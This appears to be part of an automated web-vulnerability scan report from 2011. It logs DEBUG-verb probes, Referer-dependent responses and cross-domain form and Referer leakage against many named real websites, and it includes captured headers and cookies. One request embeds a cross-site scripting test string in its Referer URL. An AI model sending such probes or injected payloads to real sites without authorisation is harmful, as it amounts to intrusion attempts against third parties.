Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

16.47. http://www.realbird.com/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.realbird.com
Path:	/Default.aspx

Issue detail

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.realbird.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Tue, 03 May 2011 10:41:43 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
P3P: CP="NOI DSP COR CUR ADM DEV OUR NOR STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

16.48. http://www.ritasice.com/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.ritasice.com
Path:	/Default.aspx

Issue detail

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.ritasice.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Tue, 03 May 2011 10:32:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

16.49. http://www.roundtablepizza.com/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.roundtablepizza.com
Path:	/Default.aspx

Issue detail

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.roundtablepizza.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Tue, 03 May 2011 10:33:04 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

16.50. http://www.runreappear.com/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.runreappear.com
Path:	/Default.aspx

Issue detail

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.runreappear.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Tue, 03 May 2011 10:33:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

16.51. http://www.sfgotobat.com/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.sfgotobat.com
Path:	/Default.aspx

Issue detail

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.sfgotobat.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Tue, 03 May 2011 10:37:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

16.52. http://www.smith-county.com/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.smith-county.com
Path:	/Default.aspx

Issue detail

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.smith-county.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Tue, 03 May 2011 11:15:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

16.53. http://www.stjohnprovidence.org/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.stjohnprovidence.org
Path:	/Default.aspx

Issue detail

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.stjohnprovidence.org
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Tue, 03 May 2011 11:34:11 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

16.54. http://www.suppress003.com/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.suppress003.com
Path:	/Default.aspx

Issue detail

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.suppress003.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Tue, 03 May 2011 10:39:24 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

16.55. http://www.threatexpert.com/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.threatexpert.com
Path:	/Default.aspx

Issue detail

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.threatexpert.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Tue, 03 May 2011 10:29:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

16.56. http://www.tmkrms.com/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.tmkrms.com
Path:	/Default.aspx

Issue detail

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.tmkrms.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Tue, 03 May 2011 10:20:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

16.57. http://www.totalinjury.com/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.totalinjury.com
Path:	/Default.aspx

Issue detail

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.totalinjury.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Tue, 03 May 2011 11:34:01 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

16.58. http://www.totallymoney.com/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.totallymoney.com
Path:	/Default.aspx

Issue detail

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.totallymoney.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Tue, 03 May 2011 10:27:52 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

16.59. http://www.trackinhalant.com/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.trackinhalant.com
Path:	/Default.aspx

Issue detail

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.trackinhalant.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Tue, 03 May 2011 10:51:08 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Basic realm="IIS - hopwalrus.com"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

16.60. http://www.tracklilliputian.com/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.tracklilliputian.com
Path:	/Default.aspx

Issue detail

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.tracklilliputian.com
Command: start-debug

Response

16.61. http://www.trackphial.com/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.trackphial.com
Path:	/Default.aspx

Issue detail

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.trackphial.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Tue, 03 May 2011 10:59:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

16.62. http://www.trackzz.com/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.trackzz.com
Path:	/Default.aspx

Issue detail

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.trackzz.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: keep-alive
Date: Tue, 03 May 2011 10:41:56 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: LinkTrust
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

16.63. http://www.trade-schools.net/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.trade-schools.net
Path:	/Default.aspx

Issue detail

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.trade-schools.net
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Set-Cookie:WEBTRENDS_ID=173.193.214.243-1829250848.30148987; expires=Wed, 02-May-2012 10:18:20 GMT; path=/
Set-Cookie:WEBTRENDS_ID=173.193.214.243-1829250848.30148987; expires=Wed, 02-May-2012 10:18:20 GMT; path=/
Connection: close
Date: Tue, 03 May 2011 10:18:20 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Basic realm="www.trade-schools.net"
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

16.64. http://www.ureader.de/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.ureader.de
Path:	/Default.aspx

Issue detail

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.ureader.de
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Tue, 03 May 2011 11:16:19 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

16.65. http://www.vanceandhines.com/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.vanceandhines.com
Path:	/Default.aspx

Issue detail

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.vanceandhines.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Tue, 03 May 2011 10:16:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

16.66. http://www.videogamecareers.com/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.videogamecareers.com
Path:	/Default.aspx

Issue detail

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.videogamecareers.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Cache-Control: private
Content-Length: 39
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
WWW-Authenticate: Basic realm=
Content-Type: text/html
Date: Tue, 03 May 2011 10:59:34 GMT
Connection: close

Debug access denied to '/Default.aspx'.

16.67. http://www.voa.org/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.voa.org
Path:	/Default.aspx

Issue detail

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.voa.org
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Tue, 03 May 2011 11:39:44 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

16.68. http://www.westathome.com/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.westathome.com
Path:	/Default.aspx

Issue detail

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.westathome.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Tue, 03 May 2011 10:52:09 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

16.69. http://www.wnyjobs.com/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.wnyjobs.com
Path:	/Default.aspx

Issue detail

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.wnyjobs.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Tue, 03 May 2011 11:30:47 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

17. Referer-dependent response previous next
There are 2 instances of this issue:

http://ads.adbrite.com/adserver/vdi/742697
http://www.facebook.com/plugins/recommendations.php

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Referer-based access controls, where the application assumes that if you have arrived from one privileged location then you are authorised to access another privileged location. These controls can be trivially defeated by supplying an accepted Referer header in requests for the vulnerable function.
Attempts to prevent cross-site request forgery attacks by verifying that requests to perform privileged actions originated from within the application itself and not from some external location. Such defences are not robust - methods have existed through which an attacker can forge or mask the Referer header contained within a target user's requests, by leveraging client-side technologies such as Flash and other techniques.
Delivery of Referer-tailored content, such as welcome messages to visitors from specific domains, search-engine optimisation (SEO) techniques, and other ways of tailoring the user's experience. Such behaviours often have no security impact; however, unsafe processing of the Referer header may introduce vulnerabilities such as SQL injection and cross-site scripting. If parts of the document (such as META keywords) are updated based on search engine queries contained in the Referer header, then the application may be vulnerable to persistent code injection attacks, in which search terms are manipulated to cause malicious content to appear in responses served to other application users.

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses is updated based on Referer data, then the same defences against malicious input should be employed here as for any other kinds of user-supplied data.

17.1. http://ads.adbrite.com/adserver/vdi/742697 previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://ads.adbrite.com
Path:	/adserver/vdi/742697

Request 1

Response 1

Request 2

GET /adserver/vdi/742697?d=3658195966029417970 HTTP/1.1
Host: ads.adbrite.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: Apache="168362123x0.728+1302188608x-1818389268"; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUio2yMg1rzEsSDbLKa4xrDFQ0lFKSszLSy3KBEsr1dYCAA%3D%3D"

Response 2

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Tue, 03 May 2011 15:41:56 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: srh="1%3Aq64FAA%3D%3D"; path=/; domain=.adbrite.com; expires=Wed, 04-May-2011 15:41:56 GMT
Set-Cookie: rb2=CiMKBjc0MjY5NxjZ1uraDCITMzY1ODE5NTk2NjAyOTQxNzk3MBAB; path=/; domain=.adbrite.com; expires=Mon, 01-Aug-2011 15:41:56 GMT
Set-Cookie: rb=0:742697:20828160:3658195966029417970:0; path=/; domain=.adbrite.com; expires=Mon, 01-Aug-2011 15:41:56 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

17.2. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Request 1

GET /plugins/recommendations.php?api_key=131596456859393&border_color=%23fff&colorscheme=light&font=arial&header=false&height=310&locale=en_US&sdk=joey&site=www.maysville-online.com&width=278 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/content/?c3a2e%22-alert(%22DORK%22)-%22f8cf8d87874=1
Cookie: datr=ei-eTSD3asNl9SJtmB_ThrM-

Response 1

Request 2

Response 2

18. Cross-domain POST previous next
There are 4 instances of this issue:

http://www.crystal-co.com/favicon.ico
http://www.getastrology.com/favicon.ico
http://www.specialops.org/favicon.ico
http://www.voa.org/favicon.ico

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.

18.1. http://www.crystal-co.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.crystal-co.com
Path:	/favicon.ico

Issue detail

The page contains a form which POSTs data to the domain oi.vresp.com. The form contains the following fields:

email_address
fid
submit

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.crystal-co.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:50:57 GMT
Server: Apache
Last-Modified: Wed, 30 Dec 2009 15:26:35 GMT
ETag: "46f03-1e000-c38e60c0"
Accept-Ranges: bytes
Content-Length: 122880
P3P: CP="NOI DEVa TAIa OUR BUS UNI STA"
Content-Type: text/html

<head>

<meta name="keywords" content="Waterford Crystal, Tracy Porter, Lenox China, Wedgwood, Jasperware, Vera Wang, Waterford, Evolution, Marquis, Riedel, Reidel, Wedgewood, Jasper, Gorham, Lennox,
...[SNIP]...
<div id="form">
<form method="post" action="http://oi.vresp.com/index" target="MyWindow" onSubmit="window.open( 'http://oi.vresp.com/index', 'MyWindow', 'scrollbars=no,width=600,height=150' ); return true;" >
<input type="text" name="email_address" value="enter email address" class="signupBox" onFocus="if(this.value=='enter email address')this.value='';" onBlur="if(this.value=='')this.value
...[SNIP]...

18.2. http://www.getastrology.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.getastrology.com
Path:	/favicon.ico

Issue detail

The page contains a form which POSTs data to the domain www.spiritnow.com. The form contains the following fields:

IsSubmitted
debug
nCategory
cQuestion
cFirstName
cEmail
txtMonth
txtMonth
txtMonth
txtMonth
txtMonth
txtMonth
txtMonth
txtMonth
txtMonth
txtMonth
txtMonth
txtMonth
txtMonth
txtDay
txtDay
txtDay
txtDay
txtDay
txtDay
txtDay
txtDay
txtDay
txtDay
txtDay
txtDay
txtDay
txtDay
txtDay
txtDay
txtDay
txtDay
txtDay
txtDay
txtDay
txtDay
txtDay
txtDay
txtDay
txtDay
txtDay
txtDay
txtDay
txtDay
txtDay
txtDay
txtYear
txtYear
txtYear
txtYear
txtYear
txtYear
txtYear
txtYear
txtYear
txtYear
txtYear
txtYear
txtYear
txtYear
txtYear
txtYear
txtYear
txtYear
txtYear
txtYear
txtYear
txtYear
txtYear
txtYear
txtYear
txtYear
txtYear
txtYear
txtYear
txtYear
txtYear
txtYear
txtYear
txtYear
txtYear
txtYear
txtYear
txtYear
txtYear
txtYear
txtYear
txtYear
txtYear
txtYear
txtYear
txtYear
txtYear
txtYear
txtYear
txtYear
txtYear
txtYear
txtYear
txtYear
txtYear
txtYear
txtYear
txtYear
txtYear
txtYear
txtYear
txtYear
txtYear
txtYear
txtYear
txtYear
txtYear
txtYear
txtYear
txtYear
txtYear
txtYear
txtYear
txtYear
txtYear
txtYear
txtYear
txtYear
txtYear
txtYear
txtYear
txtYear
txtYear
txtYear
txtYear
txtYear
txtYear
txtYear
txtYear
txtYear
txtYear
txtYear
txtYear
txtYear
txtYear
txtYear
txtYear
txtYear
txtYear
txtYear
txtYear
txtYear
txtYear
txtYear
txtYear
txtYear
txtYear
txtYear
txtYear
imageField
bHoroscopeSignup

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.getastrology.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 May 2011 11:30:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html
Set-Cookie: Witango_UserReference=D1430ED746EB0C68799CF7EE5CE84DBFE75B; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<TITLE>Horoscope and A
...[SNIP]...
</CENTER>
<form name='acct_form' action='http://www.spiritnow.com/asknow_ask_a_question' method='POST' style="margin:0px;padding:0px">
<INPUT type='hidden' name='IsSubmitted' id='IsSubmitted' value="true">
...[SNIP]...

18.3. http://www.specialops.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.specialops.org
Path:	/favicon.ico

Issue detail

The page contains a form which POSTs data to the domain specialops.site-ym.com. The form contains the following fields:

ERR_u
ERR_p
u
p
rememberme
btn_submitLogin

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.specialops.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

18.4. http://www.voa.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.voa.org
Path:	/favicon.ico

Issue detail

The page contains a form which POSTs data to the domain support.volunteersofamerica.org. The form contains the following fields:

cons_info_component
SURVEY_ID
denySubmit
cons_email
ACTION_SUBMIT_SURVEY_RESPONSE

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.voa.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

19. Cross-domain Referer leakage previous next
There are 19 instances of this issue:

http://ad.doubleclick.net/adi/N763.no_url_specifiedOX2462/B4639841.8
http://ad.yieldmanager.com/iframe3
http://ad.yieldmanager.com/imp
http://ads.bluelithium.com/st
http://ads.pointroll.com/PortalServe/
http://ads.specificmedia.com/serve/v=5
http://adserv.impactengine.com/www/2r/2o/qq/mo/objembed.html
http://adserv.impactengine.com/www/5o/b6/6d/fj/objembed.html/@@1303756287@@
http://adserv.impactengine.com/www/a5/zp/va/fr/objembed.html/@@1299531588@@
http://adserv.impactengine.com/www/sz/7s/d2/pt/objembed.html/@@1299097540@@
http://as.casalemedia.com/j
http://bh.contextweb.com/bh/drts
http://cm.g.doubleclick.net/pixel
http://cm.g.doubleclick.net/pixel
http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js
http://ib.adnxs.com/ptj
http://open.ad.yieldmanager.net/a1
http://www.facebook.com/plugins/recommendations.php
http://www.maysville-online.com/app/scripts/ajaxModules/upickemDeal.php

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

19.1. http://ad.doubleclick.net/adi/N763.no_url_specifiedOX2462/B4639841.8 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N763.no_url_specifiedOX2462/B4639841.8

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N763.no_url_specifiedOX2462/B4639841.8;sz=300x250;click=http://cdslog.contextweb.com/CDSLogger/L.aspx?q=C~503597~2587~54012~108044~94417~3~0~0~maysville-online.com~2~8~1~0~2~1~PEiOeaHGRLH4quYZj5mgESimscR103Gq~16~2~gDLdEnJ4dUI3~RiC6i2pCL3Ub~1~0~1~~;ord=1771002466?

The response contains the following links to other domains:

http://c.betrad.com/surly.js?;ad_w=300;ad_h=250;coid=279;nid=1228;crid=179
http://s0.2mdn.net/2049738/1-best_of300.jpg
http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

GET /adi/N763.no_url_specifiedOX2462/B4639841.8;sz=300x250;click=http://cdslog.contextweb.com/CDSLogger/L.aspx?q=C~503597~2587~54012~108044~94417~3~0~0~maysville-online.com~2~8~1~0~2~1~PEiOeaHGRLH4quYZj5mgESimscR103Gq~16~2~gDLdEnJ4dUI3~RiC6i2pCL3Ub~1~0~1~~;ord=1771002466? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=1190;c=1;s=1;d=9;w=300;h=250;$=audiencescience300x250
Cookie: id=c60bd0733000097||t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6107
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 03 May 2011 15:41:30 GMT
Expires: Tue, 03 May 2011 15:41:30 GMT
Discarded: true



<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
8044~94417~3~0~0~maysville-online.com~2~8~1~0~2~1~PEiOeaHGRLH4quYZj5mgESimscR103Gq~16~2~gDLdEnJ4dUI3~RiC6i2pCL3Ub~1~0~1~~http%3a%2f%2fwww.devry.edu/degree-programs/colleges-overview.jsp%3Fvc%3D167525"><img src="http://s0.2mdn.net/2049738/1-best_of300.jpg" width="300" height="250" border="0" alt="" galleryimg="no"></a></noscript>


<script type="text/javascript" src="http://c.betrad.com/surly.js?;ad_w=300;ad_h=250;coid=279;nid=1228;crid=179"></script>

19.2. http://ad.yieldmanager.com/iframe3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.yieldmanager.com
Path:	/iframe3

Issue detail

The page was loaded from a URL containing a query string:

